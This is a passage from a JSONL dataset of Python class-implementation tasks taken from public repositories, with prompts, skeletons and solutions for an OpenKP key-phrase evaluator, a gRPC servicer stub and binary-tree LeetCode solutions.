"star_events_count": 0} {"blob_id": "af84d68340d8b308a239fd36ae47c88c5128bce9", "bodies": ["json_obj = json.loads(json_str)\nif 'KeyPhrases' in json_obj:\n key_phrases = set((' '.join(lib.KeyPhrase(x).words).lower() for x in json_obj['KeyPhrases']))\n assert len(key_phrases) <= 3\nelse:\n key_phrases = None\nreturn cls(url=json_obj['url'], words=json_obj['text'].split(' '), key_phrases=key_phrases)", "d = {'url': self.url, 'text': ' '.join(self.words)}\nif self.key_phrases is not None:\n d['KeyPhrases'] = [[kp] for kp in sorted(self.key_phrases)]\nreturn json.dumps(d)", "if example.key_phrases is None:\n key_phrases = None\nelse:\n key_phrases = set((' '.join(key_phrase.words).lower() for key_phrase in example.key_phrases))\n assert len(key_phrases) <= 3\nreturn cls(url=example.url, words=example.text.split(' '), key_phrases=key_phrases)", "sorted_predictions = sorted(position_predictions, key=lambda prediction: prediction.logit, reverse=True)\nkey_phrases = []\nfor prediction in sorted_predictions:\n if prediction.phrase_len <= 0:\n continue\n key_phrase = ' '.join(self.words[prediction.start_idx:prediction.start_idx + prediction.phrase_len]).lower()\n if not key_phrase:\n continue\n if key_phrase not in key_phrases:\n key_phrases.append(key_phrase)\n if len(key_phrases) >= max_predictions:\n return key_phrases\nreturn key_phrases", "assert self.key_phrases is not None\nprecision = []\nrecall = []\nf1 = []\ntrue_positive = 0.0\nreferencelen = float(len(self.key_phrases))\nfor i in range(max_depth):\n if len(candidates) > i:\n kp_pred = candidates[i]\n if kp_pred.lower() in self.key_phrases:\n true_positive += 1\n p = true_positive / (i + 1)\n r = true_positive / referencelen\n if p + r > 0:\n f = 2 * p * r / (p + r)\n else:\n f = 0.0\n precision.append(p)\n recall.append(r)\n f1.append(f)\nreturn (precision, recall, f1)"], "bodies_text": "<|body_start_0|>\n json_obj = json.loads(json_str)\n if 'KeyPhrases' in json_obj:\n key_phrases = set((' '.join(lib.KeyPhrase(x).words).lower() for x in json_obj['KeyPhrases']))\n assert len(key_phrases) <= 3\n else:\n key_phrases = None\n return cls(url=json_obj['url'], words=json_obj['text'].split(' '), key_phrases=key_phrases)\n<|end_body_0|>\n\n<|body_start_1|>\n d = {'url': self.url, 'text': ' '.join(self.words)}\n if self.key_phrases is not None:\n d['KeyPhrases'] = [[kp] for kp in sorted(self.key_phrases)]\n return json.dumps(d)\n<|end_body_1|>\n\n<|body_start_2|>\n if example.key_phrases is None:\n key_phrases = None\n else:\n key_phrases = set((' '.join(key_phrase.words).lower() for key_phrase in example.key_phrases))\n assert len(key_phrases) <= 3\n return cls(url=example.url, words=example.text.split(' '), key_phrases=key_phrases)\n<|end_body_2|>\n\n<|body_start_3|>\n sorted_predictions = sorted(position_predictions, key=lambda prediction: prediction.logit, reverse=True)\n key_phrases = []\n for prediction in sorted_predictions:\n if prediction.phrase_len <= 0:\n continue\n key_phrase = ' '.join(self.words[prediction.start_idx:prediction.start_idx + prediction.phrase_len]).lower()\n if not key_phrase:\n continue\n if key_phrase not in key_phrases:\n key_phrases.append(key_phrase)\n if len(key_phrases) >= max_predictions:\n return key_phrases\n return key_phrases\n<|end_body_3|>\n\n<|body_start_4|>\n assert self.key_phrases is not None\n precision = []\n recall = []\n f1 = []\n true_positive = 0.0\n referencelen = float(len(self.key_phrases))\n for i in range(max_depth):\n if len(candidates) > i:\n kp_pred = candidates[i]\n if kp_pred.lower() in self.key_phrases:\n true_positive += 1\n p = true_positive / (i + 1)\n r = true_positive / referencelen\n if p + r > 0:\n f = 2 * p * r / (p + r)\n else:\n f = 0.0\n precision.append(p)\n recall.append(r)\n f1.append(f)\n return (precision, recall, f1)\n<|end_body_4|>\n", "class_docstring": "A text-only representation of an OpenKP example for eval/inference.", "class_name": "OpenKpTextExample", "detected_licenses": ["Apache-2.0", "CC-BY-4.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OpenKpTextExample:\n \"\"\"A text-only representation of an OpenKP example for eval/inference.\"\"\"\n\n def from_json(cls, json_str: Text) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a json string.\"\"\"\n <|body_0|>\n\n def to_json_string(self) -> Text:\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n <|body_1|>\n\n def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a `OpenKpExample`.\"\"\"\n <|body_2|>\n\n def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]:\n \"\"\"Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\"\"\"\n <|body_3|>\n\n def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]:\n \"\"\"Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n json_obj = json.loads(json_str)\n if 'KeyPhrases' in json_obj:\n key_phrases = set((' '.join(lib.KeyPhrase(x).words).lower() for x in json_obj['KeyPhrases']))\n assert len(key_phrases) <= 3\n else:\n key_phrases = None\n return cls(url=json_obj['url'], words=json_obj['text'].split(' '), key_phrases=key_phrases)\n<|end_body_0|>\n\n<|body_start_1|>\n d = {'url': self.url, 'text': ' '.join(self.words)}\n if self.key_phrases is not None:\n d['KeyPhrases'] = [[kp] for kp in sorted(self.key_phrases)]\n return json.dumps(d)\n<|end_body_1|>\n\n<|body_start_2|>\n if example.key_phrases is None:\n key_phrases = None\n else:\n key_phrases = set((' '.join(key_phrase.words).lower() for key_phrase in example.key_phrases))\n assert len(key_phrases) <= 3\n return cls(url=example.url, words=example.text.split(' '), key_phrases=key_phrases)\n<|end_body_2|>\n\n<|body_start_3|>\n sorted_predictions = sorted(position_predictions, key=lambda prediction: prediction.logit, reverse=True)\n key_phrases = []\n for prediction in sorted_predictions:\n if prediction.phrase_len <= 0:\n continue\n key_phrase = ' '.join(self.words[prediction.start_idx:prediction.start_idx + prediction.phrase_len]).lower()\n if not key_phrase:\n continue\n if key_phrase not in key_phrases:\n key_phrases.append(key_phrase)\n if len(key_phrases) >= max_predictions:\n return key_phrases\n return key_phrases\n<|end_body_3|>\n\n<|body_start_4|>\n assert self.key_phrases is not None\n precision = []\n recall = []\n f1 = []\n true_positive = 0.0\n referencelen = float(len(self.key_phrases))\n for i in range(max_depth):\n if len(candidates) > i:\n kp_pred = candidates[i]\n if kp_pred.lower() in self.key_phrases:\n true_positive += 1\n p = true_positive / (i + 1)\n r = true_positive / referencelen\n if p + r > 0:\n f = 2 * p * r / (p + r)\n else:\n f = 0.0\n precision.append(p)\n recall.append(r)\n f1.append(f)\n return (precision, recall, f1)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000438", "length_bytes": 7978, "license_type": "permissive", "methods": [{"docstring": "Constructs a `OpenKpTextExample` from a json string.", "name": "from_json", "signature": "def from_json(cls, json_str: Text) -> 'OpenKpTextExample'"}, {"docstring": "Serializes this instance to a JSON string.", "name": "to_json_string", "signature": "def to_json_string(self) -> Text"}, {"docstring": "Constructs a `OpenKpTextExample` from a `OpenKpExample`.", "name": "from_openkp_example", "signature": "def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample'"}, {"docstring": "Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.", "name": "get_key_phrase_predictions", "signature": "def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]"}, {"docstring": "Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.", "name": "get_score_full", "signature": "def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]"}], "n_methods": 5, "prompt": "Implement the Python class `OpenKpTextExample` described below.\n\nClass description:\nA text-only representation of an OpenKP example for eval/inference.\n\nMethod signatures and docstrings:\n- def from_json(cls, json_str: Text) -> 'OpenKpTextExample': Constructs a `OpenKpTextExample` from a json string.\n- def to_json_string(self) -> Text: Serializes this instance to a JSON string.\n- def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample': Constructs a `OpenKpTextExample` from a `OpenKpExample`.\n- def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]: Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\n- def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]: Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.", "prompted_full_text": "Implement the Python class `OpenKpTextExample` described below.\n\nClass description:\nA text-only representation of an OpenKP example for eval/inference.\n\nMethod signatures and docstrings:\n- def from_json(cls, json_str: Text) -> 'OpenKpTextExample': Constructs a `OpenKpTextExample` from a json string.\n- def to_json_string(self) -> Text: Serializes this instance to a JSON string.\n- def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample': Constructs a `OpenKpTextExample` from a `OpenKpExample`.\n- def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]: Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\n- def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]: Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.\n\n<|skeleton|>\nclass OpenKpTextExample:\n \"\"\"A text-only representation of an OpenKP example for eval/inference.\"\"\"\n\n def from_json(cls, json_str: Text) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a json string.\"\"\"\n <|body_0|>\n\n def to_json_string(self) -> Text:\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n <|body_1|>\n\n def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a `OpenKpExample`.\"\"\"\n <|body_2|>\n\n def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]:\n \"\"\"Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\"\"\"\n <|body_3|>\n\n def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]:\n \"\"\"Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n json_obj = json.loads(json_str)\n if 'KeyPhrases' in json_obj:\n key_phrases = set((' '.join(lib.KeyPhrase(x).words).lower() for x in json_obj['KeyPhrases']))\n assert len(key_phrases) <= 3\n else:\n key_phrases = None\n return cls(url=json_obj['url'], words=json_obj['text'].split(' '), key_phrases=key_phrases)\n<|end_body_0|>\n\n<|body_start_1|>\n d = {'url': self.url, 'text': ' '.join(self.words)}\n if self.key_phrases is not None:\n d['KeyPhrases'] = [[kp] for kp in sorted(self.key_phrases)]\n return json.dumps(d)\n<|end_body_1|>\n\n<|body_start_2|>\n if example.key_phrases is None:\n key_phrases = None\n else:\n key_phrases = set((' '.join(key_phrase.words).lower() for key_phrase in example.key_phrases))\n assert len(key_phrases) <= 3\n return cls(url=example.url, words=example.text.split(' '), key_phrases=key_phrases)\n<|end_body_2|>\n\n<|body_start_3|>\n sorted_predictions = sorted(position_predictions, key=lambda prediction: prediction.logit, reverse=True)\n key_phrases = []\n for prediction in sorted_predictions:\n if prediction.phrase_len <= 0:\n continue\n key_phrase = ' '.join(self.words[prediction.start_idx:prediction.start_idx + prediction.phrase_len]).lower()\n if not key_phrase:\n continue\n if key_phrase not in key_phrases:\n key_phrases.append(key_phrase)\n if len(key_phrases) >= max_predictions:\n return key_phrases\n return key_phrases\n<|end_body_3|>\n\n<|body_start_4|>\n assert self.key_phrases is not None\n precision = []\n recall = []\n f1 = []\n true_positive = 0.0\n referencelen = float(len(self.key_phrases))\n for i in range(max_depth):\n if len(candidates) > i:\n kp_pred = candidates[i]\n if kp_pred.lower() in self.key_phrases:\n true_positive += 1\n p = true_positive / (i + 1)\n r = true_positive / referencelen\n if p + r > 0:\n f = 2 * p * r / (p + r)\n else:\n f = 0.0\n precision.append(p)\n recall.append(r)\n f1.append(f)\n return (precision, recall, f1)\n<|end_body_4|>\n", "revision_id": "5573d9c5822f4e866b6692769963ae819cb3f10d", "skeleton": "<|skeleton|>\nclass OpenKpTextExample:\n \"\"\"A text-only representation of an OpenKP example for eval/inference.\"\"\"\n\n def from_json(cls, json_str: Text) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a json string.\"\"\"\n <|body_0|>\n\n def to_json_string(self) -> Text:\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n <|body_1|>\n\n def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a `OpenKpExample`.\"\"\"\n <|body_2|>\n\n def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]:\n \"\"\"Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\"\"\"\n <|body_3|>\n\n def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]:\n \"\"\"Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OpenKpTextExample:\n \"\"\"A text-only representation of an OpenKP example for eval/inference.\"\"\"\n\n def from_json(cls, json_str: Text) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a json string.\"\"\"\n json_obj = json.loads(json_str)\n if 'KeyPhrases' in json_obj:\n key_phrases = set((' '.join(lib.KeyPhrase(x).words).lower() for x in json_obj['KeyPhrases']))\n assert len(key_phrases) <= 3\n else:\n key_phrases = None\n return cls(url=json_obj['url'], words=json_obj['text'].split(' '), key_phrases=key_phrases)\n\n def to_json_string(self) -> Text:\n \"\"\"Serializes this instance to a JSON string.\"\"\"\n d = {'url': self.url, 'text': ' '.join(self.words)}\n if self.key_phrases is not None:\n d['KeyPhrases'] = [[kp] for kp in sorted(self.key_phrases)]\n return json.dumps(d)\n\n def from_openkp_example(cls, example: lib.OpenKpExample) -> 'OpenKpTextExample':\n \"\"\"Constructs a `OpenKpTextExample` from a `OpenKpExample`.\"\"\"\n if example.key_phrases is None:\n key_phrases = None\n else:\n key_phrases = set((' '.join(key_phrase.words).lower() for key_phrase in example.key_phrases))\n assert len(key_phrases) <= 3\n return cls(url=example.url, words=example.text.split(' '), key_phrases=key_phrases)\n\n def get_key_phrase_predictions(self, position_predictions: List[KpPositionPrediction], max_predictions: int=5) -> List[Text]:\n \"\"\"Returns key phrases for the given position predictions. Args: position_predictions: An unsorted list of position predictions. max_predictions: Maximum number of predicted key phrases to return. Returns: A list of the top key phrase predictions in descending order. The key phrases are lowercased and deduplicated. Empty phrases are skipped. Predictions with invalid indices are skipped.\"\"\"\n sorted_predictions = sorted(position_predictions, key=lambda prediction: prediction.logit, reverse=True)\n key_phrases = []\n for prediction in sorted_predictions:\n if prediction.phrase_len <= 0:\n continue\n key_phrase = ' '.join(self.words[prediction.start_idx:prediction.start_idx + prediction.phrase_len]).lower()\n if not key_phrase:\n continue\n if key_phrase not in key_phrases:\n key_phrases.append(key_phrase)\n if len(key_phrases) >= max_predictions:\n return key_phrases\n return key_phrases\n\n def get_score_full(self, candidates: List[Text], max_depth: int=5) -> Tuple[List[float], List[float], List[float]]:\n \"\"\"Scores the candidate predictions. Follows the official evaluate.py script. Args: candidates: Predicted key phrases (sorted by descending confidence and deduped), will be lower cased. max_depth: Maximum k for precision@k to return. Returns: Three lists (precision@k, recall@k, and F1@k), for k = 1...max_depth.\"\"\"\n assert self.key_phrases is not None\n precision = []\n recall = []\n f1 = []\n true_positive = 0.0\n referencelen = float(len(self.key_phrases))\n for i in range(max_depth):\n if len(candidates) > i:\n kp_pred = candidates[i]\n if kp_pred.lower() in self.key_phrases:\n true_positive += 1\n p = true_positive / (i + 1)\n r = true_positive / referencelen\n if p + r > 0:\n f = 2 * p * r / (p + r)\n else:\n f = 0.0\n precision.append(p)\n recall.append(r)\n f1.append(f)\n return (precision, recall, f1)\n", "source": "the_stack_v2_python_sparse", "source_path": "etcmodel/models/openkp/eval_utils.py", "source_repo": "Jimmy-INL/google-research", "split": "test", "star_events_count": 1} {"blob_id": "b7dc81606048cf0d1afa32129aa5a1b5b32f79f8", "bodies": ["context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')", "context.set_code(grpc.StatusCode.UNIMPLEMENTED)\ncontext.set_details('Method not implemented!')\nraise NotImplementedError('Method not implemented!')"], "bodies_text": "<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "class_docstring": "Missing associated documentation comment in .proto file.", "class_name": "DatasetFeedServicer", "detected_licenses": ["Apache-2.0", "BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DatasetFeedServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def get_examples(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def shutdown(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000439", "length_bytes": 3867, "license_type": "permissive", "methods": [{"docstring": "Missing associated documentation comment in .proto file.", "name": "get_examples", "signature": "def get_examples(self, request, context)"}, {"docstring": "Missing associated documentation comment in .proto file.", "name": "shutdown", "signature": "def shutdown(self, request, context)"}], "n_methods": 2, "prompt": "Implement the Python class `DatasetFeedServicer` described below.\n\nClass description:\nMissing associated documentation comment in .proto file.\n\nMethod signatures and docstrings:\n- def get_examples(self, request, context): Missing associated documentation comment in .proto file.\n- def shutdown(self, request, context): Missing associated documentation comment in .proto file.", "prompted_full_text": "Implement the Python class `DatasetFeedServicer` described below.\n\nClass description:\nMissing associated documentation comment in .proto file.\n\nMethod signatures and docstrings:\n- def get_examples(self, request, context): Missing associated documentation comment in .proto file.\n- def shutdown(self, request, context): Missing associated documentation comment in .proto file.\n\n<|skeleton|>\nclass DatasetFeedServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def get_examples(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def shutdown(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_0|>\n\n<|body_start_1|>\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n<|end_body_1|>\n", "revision_id": "43dae4b28531cde167598f104f582168b0a4141f", "skeleton": "<|skeleton|>\nclass DatasetFeedServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def get_examples(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_0|>\n\n def shutdown(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DatasetFeedServicer:\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n\n def get_examples(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def shutdown(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n", "source": "the_stack_v2_python_sparse", "source_path": "training/heterogeneous-clusters/pt.grpc.sagemaker/code/dataset_feed_pb2_grpc.py", "source_repo": "aws/amazon-sagemaker-examples", "split": "test", "star_events_count": 4797} {"blob_id": "2d697450b617fd6843744cacf27a082f64bdceed", "bodies": ["def buildChildTree(preIndex, inIndex, length):\n if length == 0:\n return None\n root = TreeNode(preorder[preIndex])\n count = 0\n while inorder[inIndex + count] != preorder[preIndex]:\n count += 1\n root.left = buildChildTree(preIndex + 1, inIndex, count)\n root.right = buildChildTree(preIndex + count + 1, inIndex + count + 1, length - count - 1)\n return root\nreturn buildChildTree(0, 0, len(preorder))", "if not preorder:\n return None\nroot = TreeNode(preorder[0])\nindex = inorder.index(preorder[0])\nroot.left = self.buildTree(preorder[1:index + 1], inorder[:index])\nroot.right = self.buildTree(preorder[index + 1:], inorder[index + 1:])\nreturn root"], "bodies_text": "<|body_start_0|>\n def buildChildTree(preIndex, inIndex, length):\n if length == 0:\n return None\n root = TreeNode(preorder[preIndex])\n count = 0\n while inorder[inIndex + count] != preorder[preIndex]:\n count += 1\n root.left = buildChildTree(preIndex + 1, inIndex, count)\n root.right = buildChildTree(preIndex + count + 1, inIndex + count + 1, length - count - 1)\n return root\n return buildChildTree(0, 0, len(preorder))\n<|end_body_0|>\n\n<|body_start_1|>\n if not preorder:\n return None\n root = TreeNode(preorder[0])\n index = inorder.index(preorder[0])\n root.left = self.buildTree(preorder[1:index + 1], inorder[:index])\n root.right = self.buildTree(preorder[index + 1:], inorder[index + 1:])\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def buildTree(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def buildTree2(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def buildChildTree(preIndex, inIndex, length):\n if length == 0:\n return None\n root = TreeNode(preorder[preIndex])\n count = 0\n while inorder[inIndex + count] != preorder[preIndex]:\n count += 1\n root.left = buildChildTree(preIndex + 1, inIndex, count)\n root.right = buildChildTree(preIndex + count + 1, inIndex + count + 1, length - count - 1)\n return root\n return buildChildTree(0, 0, len(preorder))\n<|end_body_0|>\n\n<|body_start_1|>\n if not preorder:\n return None\n root = TreeNode(preorder[0])\n index = inorder.index(preorder[0])\n root.left = self.buildTree(preorder[1:index + 1], inorder[:index])\n root.right = self.buildTree(preorder[index + 1:], inorder[index + 1:])\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000440", "length_bytes": 1314, "license_type": "permissive", "methods": [{"docstring": ":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode", "name": "buildTree", "signature": "def buildTree(self, preorder, inorder)"}, {"docstring": ":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode", "name": "buildTree2", "signature": "def buildTree2(self, preorder, inorder)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def buildTree(self, preorder, inorder): :type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\n- def buildTree2(self, preorder, inorder): :type preorder: List[int] :type inorder: List[int] :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def buildTree(self, preorder, inorder): :type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\n- def buildTree2(self, preorder, inorder): :type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\n\n<|skeleton|>\nclass Solution:\n\n def buildTree(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def buildTree2(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def buildChildTree(preIndex, inIndex, length):\n if length == 0:\n return None\n root = TreeNode(preorder[preIndex])\n count = 0\n while inorder[inIndex + count] != preorder[preIndex]:\n count += 1\n root.left = buildChildTree(preIndex + 1, inIndex, count)\n root.right = buildChildTree(preIndex + count + 1, inIndex + count + 1, length - count - 1)\n return root\n return buildChildTree(0, 0, len(preorder))\n<|end_body_0|>\n\n<|body_start_1|>\n if not preorder:\n return None\n root = TreeNode(preorder[0])\n index = inorder.index(preorder[0])\n root.left = self.buildTree(preorder[1:index + 1], inorder[:index])\n root.right = self.buildTree(preorder[index + 1:], inorder[index + 1:])\n return root\n<|end_body_1|>\n", "revision_id": "c8bf33af30569177c5276ffcd72a8d93ba4c402a", "skeleton": "<|skeleton|>\nclass Solution:\n\n def buildTree(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def buildTree2(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def buildTree(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n def buildChildTree(preIndex, inIndex, length):\n if length == 0:\n return None\n root = TreeNode(preorder[preIndex])\n count = 0\n while inorder[inIndex + count] != preorder[preIndex]:\n count += 1\n root.left = buildChildTree(preIndex + 1, inIndex, count)\n root.right = buildChildTree(preIndex + count + 1, inIndex + count + 1, length - count - 1)\n return root\n return buildChildTree(0, 0, len(preorder))\n\n def buildTree2(self, preorder, inorder):\n \"\"\":type preorder: List[int] :type inorder: List[int] :rtype: TreeNode\"\"\"\n if not preorder:\n return None\n root = TreeNode(preorder[0])\n index = inorder.index(preorder[0])\n root.left = self.buildTree(preorder[1:index + 1], inorder[:index])\n root.right = self.buildTree(preorder[index + 1:], inorder[index + 1:])\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "101-200/101-110/105-binaryTreeFromPreInOrder/binaryTreeFromPreInOrder.py", "source_repo": "xuychen/Leetcode", "split": "test", "star_events_count": 0} {"blob_id": "2d858c32871d5b958dc12f0ec79e92063d6e2c30", "bodies": ["if root == None:\n return 0\nmax_sub_depth = 0\nfor node in root.children:\n cur_depth = self.maxDepthWithRecursion(node)\n max_sub_depth = max(cur_depth, max_sub_depth)\nreturn max_sub_depth + 1", "if root == None:\n return 0\nmax_depth = 0\nqueue = []\nqueue.append([root, 1])\nwhile len(queue) > 0:\n node, depth = queue.pop(0)\n max_depth = max(max_depth, depth)\n for sub_node in node.children:\n queue.append([sub_node, depth + 